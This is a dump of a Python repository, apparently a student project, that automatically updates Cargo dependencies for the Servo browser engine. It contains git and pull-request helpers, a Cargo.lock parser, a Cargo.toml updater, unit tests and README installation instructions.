that pushes changes to the current branch of the remote repository (should be the newly created branch).\r\ndef push(path, branch_name, message):\r\n try:\r\n repo = Repo(path)\r\n print('Currently on branch: %s' % repo.head.ref)\r\n repo.git.checkout(branch_name)\r\n print('Switched to branch: %s' % repo.head.ref)\r\n print(repo.git.add(\".\"))\r\n print(repo.git.commit(m=message))\r\n repo.git.push(\"origin\", branch_name)\r\n print('')\r\n print(repo.git.status())\r\n except Exception:\r\n traceback.print_exc()\r\n\r\n\r\n# Function that pulls everything from the master branch of the remote repository to the local git clone.\r\ndef pull(path):\r\n try:\r\n repo = git.Repo(path)\r\n origin = repo.remotes.origin\r\n # only pulls the master branch\r\n s = origin.pull(\"master\")\r\n # print(repo.git.status())\r\n except Exception:\r\n traceback.print_exc()\r\n\r\n\r\n# Function that opens a pull request against Servo's GitHub repository from a particular branch on a fork.\r\ndef pull_request(username, password, title, base, head, body=None):\r\n # Login to the forked repo\r\n gh = login(username, password)\r\n # Create a Repository instance of servo (with owner Servo and repo name servo)\r\n repo = gh.repository(\"Servo\", \"servo\")\r\n # Now create the pull request\r\n repo.create_pull(title, base, head, body)\r\n # :param str title: (required) The title of the pull request.\r\n # :param str base: (required), The branch of the servo repo which you want the changes pulled into. e.g., 'master'\r\n # :param str head: (required), The place where your changes are implemented. e.g. 
'qiufengyu21:master'\r\n # :param str body: (optional), The contents of the pull request.\r\n" }, { "alpha_fraction": 0.7132616639137268, "alphanum_fraction": 0.7250384092330933, "avg_line_length": 32.1016960144043, "blob_id": "1d31ece4fb1160a6a995a3e0b6c2d4f17cab2c8a", "content_id": "74a186d7a0bdd9bdd8998f3c32e160063b47d6d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1953, "license_type": "no_license", "max_line_length": 130, "num_lines": 59, "path": "/test/test_crates_io_checker.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nimport sys\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.insert(0,path)\nimport crates_io_checker as crates\nfrom cargo_lock_parser import LockPackage\n\nclass TestCratesIOChecker(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.path = os.path.join(path,\"test\")\n\n\t\tself.package = LockPackage()\n\t\tself.package.name = \"unittest\"\n\t\tself.package.version = \"1.0\"\n\t\tself.package.source = \"src\"\n\n\t\tself.package1 = LockPackage()\n\t\tself.package1.name = \"servo\"\n\t\tself.package1.version = \"1.0\"\n\t\tself.package1.source = \"test\"\n\n\t\tself.package2 = LockPackage()\n\t\tself.package2.name = \"servo\"\n\t\tself.package2.version = \"2.0\"\n\t\tself.package2.source = \"test\"\n\n\t\tcrates.depend = {\"servo\":[{\"name\":\"servo\",\"vers\":\"1.0\",\"deps\":[]},{\"name\":\"servo\",\"vers\":\"2.0\",\"deps\":[]}]}\n\t\tcrates.CRATES = \"cargo_test\"\n\n\tdef test_check_upgrade(self):\n\t\tself.assertFalse(crates.check_upgrade(self.package))\n\t\tself.assertTrue(crates.check_upgrade(self.package1))\n\t\tself.assertFalse(crates.check_upgrade(self.package2))\n\n\tdef test_read_file(self):\n\t\tself.assertIsNone(crates.read_file(None))\n\t\tself.assertFalse('testing' in crates.depend.keys())\n\t\tread = crates.check_folder(\"testing\",os.path.join(self.path,crates.CRATES,\"te\",\"st\"))\n\t\tself.assertIsNotNone(read)\n\t\tcrates.read_file(read)\n\t\tself.assertTrue('testing' in crates.depend.keys())\n\n\tdef test_check_folder(self):\n\t\tself.assertIsNone(crates.check_folder(\"test.txt\",self.path))\n\t\tself.assertEqual(os.path.join(self.path,\"test_crates_io_checker.py\"),crates.check_folder(\"test_crates_io_checker.py\",self.path))\n\n\tdef test_check_package(self):\n\t\ttest = LockPackage()\n\t\ttest.name = \"testing\"\n\t\tself.assertIsNotNone(crates.check_package(test))\n\t\tself.assertIsNone(crates.check_package(self.package))\n\n\tdef test_check(self):\n\t\tcrates.check(self.package1)\n\t\tself.assertTrue(self.package1.upgrade_available)\n\t\tcrates.check(self.package2)\n\t\tself.assertFalse(self.package2.upgrade_available)\n" }, { "alpha_fraction": 0.7081068754196167, "alphanum_fraction": 0.7081068754196167, "avg_line_length": 36.10924530029297, "blob_id": "43516d20db2a4bef0832c6d8e6b4d02fc62ee5d8", "content_id": "09c92764de14b933dd5a644286a624f426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4416, "license_type": "no_license", "max_line_length": 111, "num_lines": 119, "path": "/servo_dependency_tool.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Servo Dependency Tool\n#\n# Authors:\n# Chris Brown ([email protected])\n# Bradford Ingersoll ([email protected])\n# Qiufeng Yu ([email protected])\n\nimport datetime\nimport getpass\nimport os\nimport shutil\n\nimport 
cargo_lock_parser\nimport cargo_toml_updater\nimport crates_io_checker\nimport repo_management\nimport run_cargo_update\n\n#\n# Main\n#\n\n# Perform a \"git pull\" on the parent directory\ngit_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nprint('Performing git pull inside \"%s\"...' % git_path)\nprint('')\nrepo_management.pull(git_path)\n\n# Create a new branch before making any updates\nbranch_name = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S_crate_update\")\nprint('Creating new branch: %s...' % branch_name)\nprint('')\nrepo_management.create_new_branch('..', branch_name)\n\n# Edit .gitignore to add this servo-dependency-tool directory\nwith open(os.path.join(git_path, '.gitignore'), \"r\") as f:\n tool_ignored = False\n for line in f:\n if line == 'servo-dependency-tool/':\n tool_ignored = True\nif not tool_ignored:\n print('Adding /servo-dependency-tool to .gitignore...')\n print('')\n with open(os.path.join(git_path, '.gitignore'), \"a\") as f:\n f.write('\\n')\n f.write('# Servo Dependency Tool\\n')\n f.write('/servo-dependency-tool')\n\n# Check for existence of Cargo.lock file and parse it\nfor filename in os.listdir(git_path):\n if filename == \"Cargo.lock\":\n print('Parsing Cargo.lock file...')\n print('')\n lock_file = cargo_lock_parser.lock_file_parse(os.path.join(git_path, filename))\n\n# Ignore hyper dependencies per Josh Matthews: \"Can't update hyper without additional work\"\n# Do so by removing it from the collection\npackage_names_to_ignore = []\nfor package_name in lock_file.packages:\n if package_name.startswith('hyper'):\n package_names_to_ignore.append(package_name)\nfor name in package_names_to_ignore:\n print('Removing %s from packages to update...' % name)\n del lock_file.packages[name]\nprint('')\n\n# Run crates_io_checker which determines the latest version for all packages in lock_file.packages\ncrates_io_checker.clone_crates()\nprint('Checking crates.io for latest version of each package...')\nprint('')\nfor package_name in lock_file.packages:\n crates_io_checker.check(lock_file.packages[package_name])\n\n# Remove the cloned crates.io-index. 
We do this here\n# so that the upcoming directory tree traversal won't\n# go into the crates.io-index folders.\nprint('Removing local clone of crates.io...')\nprint('')\nshutil.rmtree('crates.io-index')\n\n# Loop through directory tree\n# For each instance of Cargo.toml, call toml_file_update to update\n# the version numbers for each dependency\nprint('Iterating through all Cargo.toml files and updating their dependency versions...')\nprint('')\nfor root, dirs, files in os.walk(git_path):\n if 'servo-dependency-tool' in dirs:\n dirs.remove('servo-dependency-tool') # Don't visit this tool's directory\n for filename in files:\n if filename.lower() == \"cargo.toml\":\n toml_file_path = os.path.join(root, filename)\n cargo_toml_updater.toml_file_update(toml_file_path, lock_file)\n\n# \"Delete\" Cargo.lock to avoid conflicts (rename to Cargo.lock.bak)\nprint('Making a backup (Cargo.lock.bak) of the current Cargo.lock before updating...')\nprint('')\nos.rename(os.path.join(git_path, 'Cargo.lock'), os.path.join(git_path, 'Cargo.lock.bak'))\n\n# Loop through the packages again and call run_cargo_update\n# to run the appropriate update command.\nprint('Running appropriate cargo update command for each package...')\nprint('')\nfor package_name in lock_file.packages:\n if lock_file.packages[package_name].upgrade_available:\n run_cargo_update.run_update(git_path, lock_file.packages[package_name])\n\n# Push the updates to origin/branch_name\nprint('Pushing changes to new branch...')\nprint('')\nrepo_management.push(git_path, branch_name, 'Updated dependencies')\n\n# Pull request on master\nprint('Initiating pull request...')\ngh_username = input('GitHub Username: ')\ngh_password = getpass.getpass('GitHub Password: ')\ntitle = 'Updated dependencies in Cargo.toml files to latest versions'\ndesc = 'Updated all Cargo.toml files with the latest versions found on crates.io for all dependencies and ran \\\n \"./mach cargo-update -p <package_name> for each'\nrepo_management.pull_request(gh_username, gh_password, title, 'master', gh_username + ':' + branch_name, desc)\n" }, { "alpha_fraction": 0.5556005835533142, "alphanum_fraction": 0.5590439438819885, "avg_line_length": 47.861385345458984, "blob_id": "7fe1a6b80650134bbdbab479fe97d5620273aadf", "content_id": "8240fc6594fd5776c23eb6df012015b2d7db8a08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4937, "license_type": "no_license", "max_line_length": 117, "num_lines": 101, "path": "/cargo_lock_parser.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Cargo.lock Parser\n#\n# This script parses a Cargo.lock file and converts it into a\n# LockFile object. A LockFile object contains all of the information about\n# the [root] and the [[package]] sections within a Cargo.lock file.\n# NOTE: Must be placed in the same folder as the Cargo.lock file\n#\n# From our Initial Steps requirement:\n# \"write code that takes a Cargo.lock file as input and determines\n# the list of crate names and versions that are dependencies\"\n\nimport re\n\n\n# Object representing the root. A Cargo.lock file will always have one [[root]]\nclass LockRoot:\n\n def __init__(self):\n self.name = \"\"\n self.version = \"\"\n self.dependencies = []\n\n\n# Object representing a dependency. 
Each [[root]] and [[package]] within a Cargo.lock file can have >= 0 dependencies\nclass LockDependency:\n\n def __init__(self):\n self.name = \"\"\n self.version = \"\"\n self.source = \"\"\n\n\n# Object representing a [[package]] within the Cargo.lock file. A Cargo.lock file can have >= 0 packages\nclass LockPackage:\n\n def __init__(self):\n self.name = \"\"\n self.version = \"\"\n self.upgrade_available = False\n self.source = \"\"\n self.dependencies = []\n\n\n# Object representing an entire Cargo.lock file\nclass LockFile:\n\n def __init__(self):\n self.root = LockRoot()\n self.packages = {} # dictionary\n\n\n# Method to parse the passed file (a Cargo.lock file)\n# and return the lock_file object\ndef lock_file_parse(fname):\n with open(fname, 'r') as fp:\n lock_file = LockFile()\n lock_package_to_add = LockPackage() # temporary LockPackage object\n dependency_to_add = LockDependency() # temporary LockDependency object\n in_root = True # flag to determine whether the current lines are within the root or not\n for line in fp:\n if line.strip():\n if in_root:\n if line.strip().startswith('name'):\n lock_file.root.name = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('version'):\n lock_file.root.version = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('\"'): # lines that start with \" are dependencies\n dependency_string = re.findall(r'\"(.*?)\"', line)[0].split(' ')\n dependency_to_add.name = dependency_string[0] # All dependencies should have a name\n dependency_to_add.version = dependency_string[1] # All dependencies should have a version\n if len(dependency_string) == 3: # If the dependency has a third field, it has a source\n dependency_to_add.source = dependency_string[2]\n lock_file.root.dependencies.append(dependency_to_add)\n dependency_to_add = LockDependency()\n elif line.strip() == \"[[package]]\": # End of Root\n in_root = False\n else:\n # If [[package]] is found, we've reached a new package\n if line.strip() == \"[[package]]\":\n # If lock_package_to_add has data, add to list and then reset\n if lock_package_to_add.name != \"\":\n lock_file.packages[lock_package_to_add.name] = lock_package_to_add\n lock_package_to_add = LockPackage()\n elif line.strip().startswith('name'):\n lock_package_to_add.name = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('version'):\n lock_package_to_add.version = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('source'):\n lock_package_to_add.source = re.findall(r'\"(.*?)\"', line)[0]\n elif line.strip().startswith('[metadata]'):\n lock_file.packages[lock_package_to_add.name] = lock_package_to_add # add the last entry\n break\n elif not in_root and line.strip().startswith('\"'): # lines that start with \" are dependencies\n dependency_string = re.findall(r'\"(.*?)\"', line)[0].split(' ')\n dependency_to_add.name = dependency_string[0] # All dependencies should have a name\n dependency_to_add.version = dependency_string[1] # All dependencies should have a version\n if len(dependency_string) == 3: # If the dependency has a third field, it has a source\n dependency_to_add.source = dependency_string[2]\n lock_package_to_add.dependencies.append(dependency_to_add)\n dependency_to_add = LockDependency()\n return lock_file # return the lock_file object\n\n\n" }, { "alpha_fraction": 0.4993864893913269, "alphanum_fraction": 0.5012270212173462, "avg_line_length": 45.57143020629883, "blob_id": "297429b21a76c323d99721dee4bc3a35ddf6f809", "content_id": 
"ed149b41e28d557ecb2507820c85507848b8c379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1630, "license_type": "no_license", "max_line_length": 114, "num_lines": 35, "path": "/cargo_toml_updater.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Cargo.toml File Updater\n#\n# This script parses a cargo.toml file and updates all of the version numbers\n# to the version numbers from the lock_file object\n\nimport re\n\n\n# Method to update the passed file (a Cargo.toml file)\ndef toml_file_update(fname, lock_file):\n with open(fname, 'r+') as fp:\n in_dependencies = False\n lines = fp.readlines()\n fp.seek(0)\n fp.truncate()\n for line in lines:\n if line.strip():\n if line.strip().startswith('['):\n if line.strip().endswith('dependencies]'):\n in_dependencies = True\n else:\n in_dependencies = False\n elif in_dependencies:\n dependency_name = line.split(' ')[0]\n if dependency_name in lock_file.packages: # Check if package exists\n if lock_file.packages[dependency_name].upgrade_available: # Check if upgrade was found\n if len(line.split(' ')) == 3: # Line with format: <package> = \"<version>\"\n version_string = '\"' + lock_file.packages[dependency_name].version + '\"'\n line = re.sub(r'\"(.*?)\"', version_string, line)\n elif 'version = \"' in line:\n version_string = 'version = \"' + lock_file.packages[dependency_name].version + '\"'\n line = re.sub(r'version = \"(.*?)\"', version_string, line)\n else:\n in_dependencies = False\n fp.write(line)\n" }, { "alpha_fraction": 0.70652174949646, "alphanum_fraction": 0.717391312122345, "avg_line_length": 29.66666603088379, "blob_id": "eb4564efa31d434b06f6b9d0639378285ec9905d", "content_id": "1d99d3b1f43aca878fb6653eab4afa2be3779ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 55, "num_lines": 3, "path": "/test/README.md", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "## Servo Dependency Tool Unittests\n\nRun: python3 -m unittest \\<module-name> (without \".py\")\n" }, { "alpha_fraction": 0.7355595827102661, "alphanum_fraction": 0.750902533531189, "avg_line_length": 41.21904754638672, "blob_id": "1a18ba937fac717535fed4e5da9623350e8ade24", "content_id": "d56f895f65b43bb590fb1990282f356fe1b6c701", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4432, "license_type": "no_license", "max_line_length": 558, "num_lines": 105, "path": "/README.md", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "# Cargo Upgrade Service Project\nNC State CSC517: Object-Oriented Design and Development\n\nChris Brown ([email protected]) \nBradford Ingersoll ([email protected]) \nQiufeng Yu ([email protected])\n\nThe **Servo Dependency Tool** is a set of python scripts that automatically upgrades [Cargo](http://doc.crates.io/index.html) dependencies for the Servo web browser engine (Github page: https://github.com/servo/servo).\n\n## Video:\n[![Demo Video](https://img.youtube.com/vi/-xS-6JY2o_o/0.jpg)](https://www.youtube.com/watch?v=-xS-6JY2o_o)\n\n## Background Information\n[Servo](https://github.com/servo/servo) is a prototype web browser engine written in the Rust language. It is currently developed on 64bit OS X, 64bit Linux, and Android. 
Servo depends on numerous other Rust libraries that are published on [the package manager crates.io](https://crates.io/). There are no notifications for when packages are updated; it's up to developers to keep track of when they need to upgrade their dependencies. The goal of the Servo Dependency Tool is to automatically upgrade Servo's dependencies whenever new versions are released.\n\n## Tool Workflow Overview\n*This gives a high-level summary of the tool's workflow*\n1. Perform a pull to ensure servo is up-to-date\n2. Create a new branch for the updates\n3. Parse the Cargo.lock file for all packages and their current versions\n4. Clone the crates.io index and check each package from the previous step for a more recent version\n5. Locate all Cargo.toml files in the servo project and update their dependencies with the most recent version found in the previous step\n6. Execute the cargo update command for each package (specifying the version when ambiguity occurs)\n7. Push these updates to the upstream branch\n8. Create a pull request on the main servo repository with these updated dependencies\n\n## Installation\n### Prerequisites\n- [Servo web engine](https://github.com/servo/servo)\n- [Python3](https://www.python.org/download/releases/3.0/)\n### Installing GitPython and github3.py\nThe Servo Dependency Tool requires two external libraries ([GitPython](https://github.com/gitpython-developers/GitPython) and [github3.py](https://github.com/sigmavirus24/github3.py)) in order to interact with the Servo GitHub repository, push the latest dependencies, and open pull requests.\n- Install GitPython\n```\n python3 -m pip install gitpython\n```\n- Install github3.py\n```\n python3 -m pip install github3.py\n```\n## Running Locally\nIn order to run the tool, first make a local clone of the [Servo](https://github.com/servo/servo) repository\n```\n git clone https://github.com/servo/servo.git\n```\nand then run the main driver file: **servo_dependency_tool.py**.\n```\n python3 servo_dependency_tool.py\n```\nThe tool will first run a git pull command to get the latest version of the Servo repository, then it will create a new branch on the local clone and update all the dependencies. 
Finally, it will open a new pull request against Servo's GitHub repository from our local fork.\n\n**For more detailed instructions on how to use this tool, please click on the video at the top.**\n\n[Issue Tracker](https://github.com/servo/servo/issues/15600)\n\n[Servo Wiki page](https://github.com/servo/servo/wiki/Cargo-upgrade-service-project)\n\n## Running on Amazon AWS (Ubuntu 14.04)\nLaunch a virtual machine with EC2 (Ubuntu 14.04)\n\nOnce running, SSH to the server using the steps listed on the EC2 Instances \"Connect\" button\n\nOnce logged in, update the package listings in apt-get\n```\n sudo apt-get update\n```\n\nInstall all necessary packages for servo (from the Servo README)\n```\n sudo apt-get install git curl freeglut3-dev autoconf \\\n libfreetype6-dev libgl1-mesa-dri libglib2.0-dev xorg-dev \\\n gperf g++ build-essential cmake python-virtualenv python-pip \\\n libssl-dev libbz2-dev libosmesa6-dev libxmu6 libxmu-dev \\\n libglu1-mesa-dev libgles2-mesa-dev libegl1-mesa-dev libdbus-1-dev\n```\n\nInstall python3 pip\n```\n sudo apt-get install python3-pip\n```\n\nInstall the necessary python3 modules\n```\n sudo python3 -m pip install gitpython github3.py\n```\n\nClone the servo-based repo (servo or the forked instance of servo)\n```\n git clone https://github.com/servo/servo.git\n```\n\nNavigate to the new directory\n```\n cd servo\n```\n\nClone the servo-dependency-tool repo (must be inside the root servo folder)\n```\n git clone https://github.com/chbrown13/servo-dependency-tool.git\n```\n\nRun the tool\n```\n sudo python3 servo_dependency_tool.py\n```" }, { "alpha_fraction": 0.6024096608161926, "alphanum_fraction": 0.6044176816940308, "avg_line_length": 47.225807189941406, "blob_id": "a3ad8be35a5cd12fff9a49ac170f3911b8d8cf00", "content_id": "bb3d1c3008cbfcd1d19a3c199c6279201c2df1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1494, "license_type": "no_license", "max_line_length": 111, "num_lines": 31, "path": "/run_cargo_update.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\n\ndef run_update(git_path, pkg):\n print(\"Running update for %s\" % pkg.name)\n if os.path.isfile(os.path.join(git_path, 'mach')):\n mach_path = git_path + '/mach'\n args = [mach_path, 'cargo-update', '-p', pkg.name]\n else: # Otherwise use default cargo update command\n cargo_bin_path = os.path.expanduser('~/.cargo/bin/cargo')\n args = [cargo_bin_path, 'update', '-p', pkg.name]\n print('This may take a moment...')\n print(args)\n cmd_out = None\n cmd_err = None\n cmd_out, cmd_err = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n print(cmd_err.decode('utf-8'))\n if 'is ambiguous.' in cmd_err.decode('utf-8'): # If failure due to ambiguity, use precise version\n if os.path.isfile(os.path.join(git_path, 'mach')):\n mach_path = git_path + '/mach'\n args = [mach_path, 'cargo-update', '-p', (pkg.name + ':' + pkg.version)]\n else: # Otherwise use default cargo update command\n cargo_bin_path = os.path.expanduser('~/.cargo/bin/cargo')\n args = [cargo_bin_path, 'update', '-p', (pkg.name + ':' + pkg.version)]\n print('Specifying version %s...' 
% pkg.version)\n print('This may take a moment...')\n print(args)\n cmd_out = None\n cmd_err = None\n cmd_out, cmd_err = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n print(cmd_err.decode('utf-8'))" }, { "alpha_fraction": 0.6355785727500916, "alphanum_fraction": 0.6597582101821899, "avg_line_length": 22.15999984741211, "blob_id": "73610c8b02c734a09d70f044d09677b2b4536d42", "content_id": "386fa8e56a6bdb5a8ce20f759f4fc19bda68a0df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 579, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/test/Cargo.toml", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "[package]\nname = \"cargo-toml\"\nauthors = [\"Q\",\n \"Bradford\",\n \"Chris\"]\n\nversion = \"2.3\"\n\ndescription = \"This is a test cargo.toml file\"\nreadme = \"README.md\"\nkeywords = [\"cargo\", \"cargo-subcommand\", \"cli\", \"dependencies\", \"crates\"]\nlicense = \"\"\n\ndocumentation = \"https://github.com/chbrown13/servo-dependency-tool\"\nhomepage = \"https://github.com/chbrown13/servo-dependency-tool\"\nrepository = \"https://github.com/chbrown13/servo-dependency-tool\"\n\n[[bin]]\nname = \"cargo-list\"\npath = \"path/to/bin\"\n\n[dependencies]\nservo = \"0.0.0\"\ntoml = \"0.0\"\nrustc-serialize = \"0\"\n" } ]
13
jordansimonovski/coffee-bot
https://github.com/jordansimonovski/coffee-bot
6be525a8da90e489ec108092183b528597c58104
4d1aac20db767e22c9acfdf624f2aa452e407640
9790b15d1e1d0be21c026ebcbfae180ddfcdb6ef
refs/heads/master
2021-01-23T01:56:40.692372
2017-05-31T06:51:04
2017-05-31T06:51:04
92,901,684
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 26, "blob_id": "1e11176478e9416c1c1457b93bffa590f370f21a", "content_id": "6aad16db2a842da987a5c7cc4fece36e1defc2a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27, "license_type": "no_license", "max_line_length": 26, "num_lines": 1, "path": "/modules/__init__.py", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "__all__ = ['promptCoffee']\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.687747061252594, "avg_line_length": 23.095237731933594, "blob_id": "1166970e5641f4ca366cca35f08887ed004989d3", "content_id": "e9d2415f7be4d3e4355193a612e8a56892be3d90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 506, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/modules/slackConnector.py", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "import requests\nimport json\nimport os\n\nslackWebhook = os.environ.get('slack_webhook')\n\ndef buildMessage(question, imageUrl):\n\tslackMessage = {\n\t\t\"response_type\": \"in_channel\",\n\t\t\"attachments\": [{\n\t\t\t\"text\": question,\n\t\t\t\"color\": \"#3AA3E3\",\n\t\t\t\"attachment_type\": \"default\",\n \"image_url\": imageUrl\n\t\t}]\n\t}\n\treturn json.dumps(slackMessage)\n\ndef sendMessage(question, imageUrl):\n\tslackMessage = buildMessage(question, imageUrl)\n\tresponse = requests.post(slackWebhook, data=slackMessage)\n" }, { "alpha_fraction": 0.6383952498435974, "alphanum_fraction": 0.6637048721313477, "avg_line_length": 47.2337646484375, "blob_id": "035751ef69af961157df941c9c4932ff52e5b427", "content_id": "cf0aa0449b6716a508d74bd12a501d20b23249ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3714, "license_type": "no_license", "max_line_length": 133, "num_lines": 77, "path": "/modules/promptCoffee.py", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "import slackConnector\nimport random\nimport os\nfrom datetime import *\nimport pytz\n\ntz = pytz.timezone(\"Australia/Sydney\")\n\ncoffeePlaces = [\"Cafe XXII\",\"La Tienda Cafe\",\"harris.miller\",\"Le Trader\",\"the Nespresso Machine\", \"that Cafe on Level 3\", \"Bar Zini\"]\ncoffeeGifs = [\n \"https://media.giphy.com/media/l0MYAqn2iVLPTRGUw/giphy.gif\",\n \"https://media.giphy.com/media/l0MYAqn2iVLPTRGUw/giphy.gif\",\n \"https://media.giphy.com/media/oZEBLugoTthxS/giphy.gif\",\n \"https://media.giphy.com/media/zJ8ldRaGLnHTa/giphy.gif\",\n \"https://media.giphy.com/media/687qS11pXwjCM/giphy.gif\",\n \"https://media.giphy.com/media/10sKNgit3jiU2A/giphy.gif\",\n \"https://media.giphy.com/media/ceeFbVxiZzMBi/giphy.gif\",\n \"https://media.giphy.com/media/NJokhR7GCs0uY/giphy.gif\",\n \"https://media.giphy.com/media/R1fqW7QTkR8je/giphy.gif\",\n \"https://media.giphy.com/media/R5MzmBwjgu7UA/giphy.gif\",\n \"https://media.giphy.com/media/c2Enke05DX6F2/giphy.gif\",\n \"https://media.giphy.com/media/V3MlKQ1G0pV3G/giphy.gif\",\n \"https://media.giphy.com/media/zVcSYlq1DqTYs/giphy.gif\",\n \"https://media.giphy.com/media/NHUONhmbo448/giphy.gif\",\n \"https://media.giphy.com/media/5xaYLxI6riEuY/giphy.gif\",\n \"https://media.giphy.com/media/l2JI4zgwXw5IfyssE/giphy.gif\",\n \"https://media.giphy.com/media/xThuWjDsB8IbJggCME/giphy.gif\",\n 
\"https://media.giphy.com/media/11Lz1Y4n1f2j96/giphy.gif\",\n \"https://media.giphy.com/media/4WpvHyRMXCoww/giphy.gif\",\n \"https://media.giphy.com/media/13Y7TygzhUgT28/giphy.gif\",\n \"https://media.giphy.com/media/xTiTnLIpvL5o1tBy5W/giphy.gif\",\n \"https://media.giphy.com/media/xUySTv9gnqA5rDCKWs/giphy.gif\",\n \"https://media.giphy.com/media/oj05uAreWGy8U/giphy.gif\",\n \"https://media.giphy.com/media/3o6MbaY2SJYZvHctMY/giphy.gif\",\n \"https://media.giphy.com/media/oAzEHPyMlMHXW/giphy.gif\",\n \"https://media.giphy.com/media/w9XH7o9BbuLok/giphy.gif\",\n \"https://media.giphy.com/media/uAtUk9luIYL1C/giphy.gif\",\n \"https://media.giphy.com/media/7hLRKL65FxCuY/giphy.gif\",\n \"https://media.giphy.com/media/6n7d5NJoCSKfS/giphy.gif\",\n \"https://media.giphy.com/media/F6d5oNpTLssQ8/giphy.gif\"\n ]\n\nquestions = [\n \"It's that time of the day for some coffee from {0}\",\n \"Coffee? \\n I hear {0} does great coffee.\",\n \"Who wants some caffeinated goodness from {0}\",\n \"{0}. You guys in?\",\n \"Coffee comrades! \\n Time for some coffee from {0}\",\n \"COFFEE, COFFEE, COFFEE, COFFEE, COFFEE, COFFEE! \\n Let's go to {0}\",\n \"Nothing like having some warm, creamy coffee slide down your throat at {0}\",\n \"Guise. Time. For. Coffee. \\n {0}?\",\n \"Oh would you look at the time? \\n It looks like it's time for some coffee from {0}\",\n \"What's that in your hands? \\n It's not coffee. Maybe you should get some from {0}\",\n \"Ding ding ding! Coffee Time! \\n You should check out {0} today.\",\n \"Coffee. {0}. Nuff said.\",\n \"Hey you guys wanna go get some coffee? I'm thinking {0} today.\",\n \"Need. Coffee. \\n Brain no worky. \\n Go to {0}\"\n\t]\n\ndef checkDay():\n today = datetime.now(pytz.utc)\n localisedToday = today.astimezone(tz)\n return localisedToday.strftime(\"%A\")\n\ndef askQuestion():\n coffeeGif = random.choice(coffeeGifs)\n day = checkDay()\n if day in dayActions:\n slackConnector.sendMessage(dayActions[day], coffeeGif)\n else:\n cafe = random.choice(coffeePlaces)\n\tquestion = random.choice(questions)\n\tslackConnector.sendMessage(question.format(cafe), coffeeGif)\n\ndayActions = {\n \"Tuesday\": \"Cheap Tuesdays at Antidote. Go go go!\"\n}\n" }, { "alpha_fraction": 0.3414634168148041, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 12.666666984558105, "blob_id": "a47ea9fff823fdef75c78d47ba795584e11e237e", "content_id": "9ad6725b0fd021004d1f597113574a085d8d3fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 41, "license_type": "no_license", "max_line_length": 13, "num_lines": 3, "path": "/requirements.txt", "repo_name": "jordansimonovski/coffee-bot", "src_encoding": "UTF-8", "text": "zappa==0.41.1\nflask==0.12.1\npytz==2017.2\n" } ]
4
maheshkumarmadire/TechGig-Challenges
https://github.com/maheshkumarmadire/TechGig-Challenges
83dac59ca3c87f9344960f71644c0cf0ab1da380
60b9ee35bb8e434aa3a5cf2178d01a89fc3bd964
15e305956549f983fa2f7f5dec2247c7c211f4af
refs/heads/master
2020-05-19T13:11:06.464445
2019-05-05T13:15:04
2019-05-05T13:15:04
185,033,093
0
0
null
null
null
null
null
